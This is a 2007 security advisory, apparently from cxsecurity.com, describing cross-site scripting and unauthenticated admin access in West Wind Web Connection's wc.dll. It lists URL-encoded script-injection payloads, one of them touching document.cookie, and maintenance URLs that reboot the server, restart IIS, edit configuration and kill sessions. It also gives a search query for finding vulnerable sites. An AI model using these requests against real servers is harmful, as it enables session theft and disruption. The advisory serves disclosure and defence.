WCONNECT WC.DLL Cross-Site Scripting Vulnerability & Remote Privileges Escalation

2007.12.17
Credit: Doz
Risk: Medium
Local: No
Remote: Yes
CVE: GENERIC-MAP-NOMATCH
CWE: N/A

[HSC] WCONNECT WC.DLL Cross-Site Scripting Vulnerability West Wind Web Connection is a tool for building Web applications using the Visual FoxPro environment but is also Vulnerable to Cross-Site scripting attacks. Admins need to password protect the application since its installed with out password on default. Also senatize the code to disallow xss attacks or javascript. Hackers Center Security Group (http://www.hackerscenter.com) Credit: Doz Risk: Medium Class: Cross Site Scripting Remote: YES Local: Yes Vendor: West Wind Technologies http://www.west-wind.com Product Version: All Versions * Attackers can exploit these issues via a web client. Examples: /wc.dll?=%22%3E%3Cscript%3Ealert('Hello');%3C/script%3E /wiki/wc.dll?AA~%22%3E%3Cscript%3Ealert('Hello');%3C/script%3E /wc.dll?Wiki~Admin/%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E Remote Privileges Escalation: (Password Unprotected Application) Log - /wc.dll?wwmaint~showlog ISAPI Configuration - /wc.dll?_maintain~ShowStatus DLL Error Log - /wc.dll?wwMaint~wcDLLErrorLog Server Status - /wc.dll?wwMaint~ServerStatus View of settings - /wc.dll?wwmaint~ShowStatus Editing Config Files - /wc.dll?wwMaint~EditConfig Reboot Machine - /wc.dll?wwMaint~RebootMachine Restart IIS - /wc.dll?wwMaint~RebootMachine~&RestartOnly=On Web Connection Kill - /wc.dll?wwmaint~sessions~KILL Google Search: http://www.google.com/search?q=ext%3Adll+inurl%3A%28wc%29&btnG=Search&hl=en


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top